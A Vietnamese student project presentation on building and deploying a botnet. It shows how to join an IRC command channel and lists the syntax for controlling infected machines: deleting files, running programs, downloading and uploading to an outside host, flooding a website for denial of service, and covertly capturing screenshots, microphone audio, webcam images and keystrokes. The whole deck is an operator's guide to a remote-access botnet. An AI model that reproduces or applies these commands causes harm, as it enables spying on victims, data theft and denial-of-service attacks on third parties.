1. ĐỒ ÁN “XÂY DỰNG VÀ
TRIỂN KHAI MẠNG BOTNET”
Giảng viên hướng dẫn : Võ Đỗ Thắng
Sinh viên thực hiện : Hoàng Xuân Nhật Huy
2. Giới thiệu về Bot và Botnet :
Bot là viết tắt của robot, tức các chương
trình tự động hoá (chứ không phải là
người máy như nghĩa chúng ta vẫn gọi)
thường xuyên được sử dụng trong thế giới
Internet
Botnet là những chương trình cho phép kẻ
tấn công sử dụng máy của họ như là
những Zoombie và chúng chủ động kết
nối với một Server để dễ dàng điều khiển
3. I/ Cài đặt công cụ giao tiếp với Botnet
Ở đây chúng ta sử dụng chương trình
Xchat
B1: Chọn user là postmodernism
5. B3 : Chọn “Sửa” , điền tên của máy chủ là irc.quakenet.org
6. B4 : Chọn “Đóng” và ra màn hình chính chọn “Kết nối” , ta được
cửa sổ như hình dưới , nhập vào từ “rock0em” , đây chính là kênh
ta điều khiển botnet
8. Lệnh checkinfo
-Cú pháp : checkinfo@[tên máy bị nhiễm]
Lệnh delete
-Cú pháp : delete@[tên máy bị nhiễm]@[đường dẫn tới file cần xóa]
Lệnh run
-Cú pháp : run@[tên máy bị nhiễm]@[đường dẫn tới file .exe , .bat]
9. Lệnh download
-Cú pháp : download@[tên máy bị nhiễm]@[link file cần down]@[địa chỉ lưu lại]
Lệnh upload
-Cú pháp : upload@[tên máy bị nhiễm]@[user của host]@[pass của host]
@[địa chỉ của file ở máy]@[vị trí muốn lưu lại trên host]
-Ở đây em đã đăng kí một host miễn phí là
www.dienthoaihanquoc.netau.net , phần địa chỉ này của host được em lưu
sẵn trong botnet nên không cần nhập vào
10. Lệnh rundos
-Cú pháp : rundos@[tên máy bị nhiễm]@[lệnh dos muốn thực hiện]
Lệnh processclose
-Cú pháp : processclose@[tên máy bị nhiễm]@[process muốn tắt]
11. Lệnh processlist
-Cú pháp : processlist@[tên máy bị nhiễm]@[số thứ tự của process đầu tiên của
list]@[số thứ tự của process cuối cùng của list]
Lệnh filelist
-Cú pháp : filelist@[tên máy bị nhiễm]@[folder muốn kiểm tra]@[số thứ tự
của file đầu tiên của folder]@[số thứ tự của file cuối cùng của folder]
12. Lệnh flood
-Cú pháp : filelist@[tên website muốn tấn công DOS]@[kích thước một gói tin
muốn gửi]
Lệnh snapshot
-Cú pháp : snapshot@[tên máy bị nhiễm]@[user của host]@[pass của
host]@[vị trí lưu file chụp màn hình trên máy bị nhiễm]@[vị trí muốn lưu file
chụp màn hình trên host]
13. Lệnh soundrecord
-Cú pháp : soundrecord@[tên máy bị nhiễm]@[vị trí lưu file ghi âm]@[thời
gian ghi âm (giây)]
-Sử dụng micro có sẵn của máy tính để thu âm các cuộc nói chuyện
Lệnh commandcam
-Cú pháp : commandcam@[tên máy bị nhiễm]
-Sử dụng webcam có sẵn của máy tính để chụp hình người sử dụng , vị trí lưu
file ảnh mặc định là C:image.bmp
14. Lệnh keylog(1)
-Cú pháp : keylog(1)@[tên máy bị nhiễm]
-Kích hoạt chức năng keylog , để khóa chức năng này , dùng cú pháp
keylog(0)@[tên máy bị nhiễm]
-File log được ghi lại dưới dạng file html , mặc định nằm cùng folder với
file soldier